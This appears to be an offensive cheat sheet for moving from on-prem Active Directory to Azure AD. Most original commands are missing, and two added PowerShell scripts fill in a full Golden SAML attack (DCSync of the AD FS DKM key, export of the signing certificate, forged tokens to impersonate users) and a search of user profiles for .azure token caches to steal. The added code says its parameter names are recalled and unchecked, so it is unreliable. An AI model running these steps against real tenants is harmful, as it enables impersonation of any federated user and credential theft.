On-Prem → Cloud

Dumping AAD Connect Creds

Tools

Forging AD FS SAML Tokens (Golden SAML)

Install AADInternals v0.9.3:

Check whether Azure AD is configured as a relying party trust on the AD FS farm:

Get AD FS config:

Get the object GUID of the AD object holding the DKM key that protects the token-signing private key:

Ensure you have enough privileges to DCSync:

DCSync the key:

Clear-text credentials are not needed to replicate the key if a privileged TGT has already been imported into the session (pass-the-ticket), so the $Credentials parameter (here, C:\Program Files\WindowsPowerShell\Modules\AADInternals\0.9.3\DRS_Utils.ps1) can be omitted and the replication call runs in the current Kerberos context.

Decrypt and export the token-signing certificate (private key included):

Get the issuer URI of the AD FS trust and the ImmutableIDs (cloud anchors) of the on-prem users to impersonate:

Generate a forged SAML token for the WS-Federation (SOAP-based) exchange:

Generate a forged SAML token for the SAML 2.0 (XML-based) exchange:

Generate a forged SAML token, impersonate the user and log in:
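The whole procedure above written out end to end, as an added example that is not code from the original page. The cmdlet names are AADInternals' own and the ADFS/ActiveDirectory ones are built-in, but the exact parameter names of the AADInternals cmdlets are recalled from its documentation and should be confirmed with Get-Help <cmdlet> -Full against the installed 0.9.3 module; contoso.com, dc01.contoso.com, sts.contoso.com and the user jdoe are placeholders.

```powershell
# Added example, not from the original page. AADInternals parameter names are assumptions
# to be checked with Get-Help; contoso.com, dc01, sts and jdoe are placeholder values.

# Pin the version so paths such as ...\AADInternals\0.9.3\DRS_Utils.ps1 match the text above
Install-Module AADInternals -RequiredVersion 0.9.3 -Scope CurrentUser
Import-Module  AADInternals -RequiredVersion 0.9.3

# 1) Is Azure AD a relying party of this farm? (built-in ADFS module, run on the AD FS server)
Get-AdfsRelyingPartyTrust |
    Where-Object { $_.Identifier -contains 'urn:federation:MicrosoftOnline' } |
    Select-Object Name, Enabled, Identifier

# 2) Export the AD FS configuration (local admin or AD FS service account on the AD FS server)
$ADFSConfig = Export-AADIntADFSConfiguration -Local

# 3) The DKM key protecting the token-signing private key is a contact object under
#    CN=ADFS,CN=Microsoft,CN=Program Data,<domain>; the key bytes sit in thumbnailPhoto.
#    After a key rollover several contacts exist; CN=CryptoPolicy's displayName names the current one.
$dkmObject = Get-ADObject -SearchBase 'CN=ADFS,CN=Microsoft,CN=Program Data,DC=contoso,DC=com' `
    -SearchScope Subtree -LDAPFilter '(&(objectClass=contact)(thumbnailPhoto=*))' |
    Select-Object -First 1
$keyGuid = $dkmObject.ObjectGUID.ToString()

# 4) Confirm DCSync rights on the domain naming context before trying to replicate the object:
#    DS-Replication-Get-Changes (...aa) and DS-Replication-Get-Changes-All (...ad) are both needed
$replGuids = '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'
(Get-Acl 'AD:\DC=contoso,DC=com').Access |
    Where-Object { $_.ObjectType.ToString() -in $replGuids -and $_.AccessControlType -eq 'Allow' } |
    Select-Object IdentityReference, ObjectType

# 5) DCSync the key object. With a privileged TGT already in the session, drop -Credentials.
$ADFSKey = Export-AADIntADFSEncryptionKey -Server dc01.contoso.com -ObjectGuid $keyGuid `
    -Configuration $ADFSConfig -Credentials (Get-Credential)

# 6) Decrypt the configuration with the DKM key and write the certificates out as PFX files
Export-AADIntADFSCertificates -Configuration $ADFSConfig -Key $ADFSKey   # produces ADFS_signing.pfx

# 7) Issuer URI of the trust and the victim's ImmutableID (base64 of the on-prem objectGUID bytes,
#    which is what AAD Connect writes as the cloud anchor)
$issuer = (Get-AdfsProperties).Identifier           # e.g. http://sts.contoso.com/adfs/services/trust
$imm    = [Convert]::ToBase64String((Get-ADUser jdoe).ObjectGUID.ToByteArray())

# 8) Forge tokens with the stolen signing key. WS-Federation carries a SAML 1.1 assertion; the
#    SAML 2.0 variant is for tenants federated over SAML-P. Both are signed with the same key.
$wsfedToken = New-AADIntSAMLToken  -ImmutableID $imm -Issuer $issuer -PfxFileName .\ADFS_signing.pfx
$saml2Token = New-AADIntSAML2Token -ImmutableID $imm -Issuer $issuer -PfxFileName .\ADFS_signing.pfx

# 9) Impersonate: trade the token for an access token, or open the portal as the user
$at = Get-AADIntAccessTokenForAADGraph -SAMLToken $wsfedToken -SaveToCache
Open-AADIntOffice365Portal -ImmutableID $imm -Issuer $issuer -PfxFileName .\ADFS_signing.pfx
```

Two things to check before relying on the forged token: the issuer Azure AD will accept is the IssuerUri registered on the federated domain (Get-MsolDomainFederationSettings), which can differ from the AD FS farm identifier if it was customized; and the tenant only accepts tokens signed with the certificate currently registered for the domain, so a rolled-over signing key that has not yet been published to Azure AD will not work.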

Refresh Token from ESTSAuth* Cookies

Automated with TokenTacticsV2:

Mass Cookies Harvesting

Collect browser cookies with dploot and decrypt them with the domain DPAPI backup key (the same approach HEKATOMB uses):

Search for ESTSAUTHPERSISTENT cookies:

Mass Hidden Directories Searching

Impacket's smbclient.py extension that searches for hidden directories in every user's home directory:

Collect hidden directories:

Search for hidden directories that start with .az:
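A PowerShell counterpart of that search, as an added example that is not the smbclient.py extension from the page nor code from the original. It runs over a constructed temporary tree standing in for C:\Users; to run it over SMB, point -UsersRoot at an admin share such as \\target\C$\Users (hypothetical host). Note the caveat it encodes: on Windows a leading dot does not set the Hidden attribute, so directories like .azure created by the Azure CLI are only "hidden" by name.

```powershell
# Added example, not from the original page or the smbclient.py extension it mentions.
function Find-HiddenUserDirs {
    param(
        [Parameter(Mandatory)][string]$UsersRoot,   # C:\Users or \\target\C$\Users (hypothetical)
        [string]$Prefix = ''                        # e.g. '.az' to keep only .azure, .azcopy, ...
    )
    # One entry per profile directory directly under the users root (-Force includes hidden profiles)
    foreach ($profileDir in Get-ChildItem -LiteralPath $UsersRoot -Directory -Force -ErrorAction SilentlyContinue) {
        # -Force surfaces hidden/system entries; -Directory keeps only folders
        Get-ChildItem -LiteralPath $profileDir.FullName -Directory -Force -ErrorAction SilentlyContinue |
            Where-Object {
                # Either the Hidden attribute or a dot-prefixed name counts as "hidden":
                # tools such as az/azcopy create plain '.azure'/'.azcopy' folders without the attribute
                ($_.Attributes.HasFlag([IO.FileAttributes]::Hidden) -or $_.Name.StartsWith('.')) -and
                $_.Name.StartsWith($Prefix, [StringComparison]::OrdinalIgnoreCase)
            } |
            ForEach-Object {
                [pscustomobject]@{ User = $profileDir.Name; Dir = $_.Name; Path = $_.FullName }
            }
    }
}

# Constructed sample tree (assumption: stands in for the users root of a target host)
$root = Join-Path ([IO.Path]::GetTempPath()) ('users_' + [guid]::NewGuid().ToString('N'))
$sample = @(
    @{ User = 'alice'; Dir = '.azure';    Hidden = $false },  # dot-name only, as Azure CLI creates it
    @{ User = 'alice'; Dir = 'Documents'; Hidden = $false },
    @{ User = 'bob';   Dir = '.aws';      Hidden = $true  },
    @{ User = 'bob';   Dir = '.azcopy';   Hidden = $true  },
    @{ User = 'bob';   Dir = 'Secrets';   Hidden = $true  }   # Hidden attribute, no dot
)
foreach ($s in $sample) {
    $d = New-Item -ItemType Directory -Path (Join-Path $root (Join-Path $s.User $s.Dir)) -Force
    if ($s.Hidden) { $d.Attributes = $d.Attributes -bor [IO.FileAttributes]::Hidden }
}

# All hidden directories per user, then only the ones starting with .az
Find-HiddenUserDirs -UsersRoot $root               | Format-Table -AutoSize
Find-HiddenUserDirs -UsersRoot $root -Prefix '.az' | Format-Table -AutoSize

Remove-Item -LiteralPath $root -Recurse -Force
```

The Path column is what you would then pull with smbclient.py or Copy-Item over the admin share; the .azure folder in particular holds msal_token_cache and azureProfile.json for the Azure CLI, which is why the .az prefix is the one worth searching for first.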
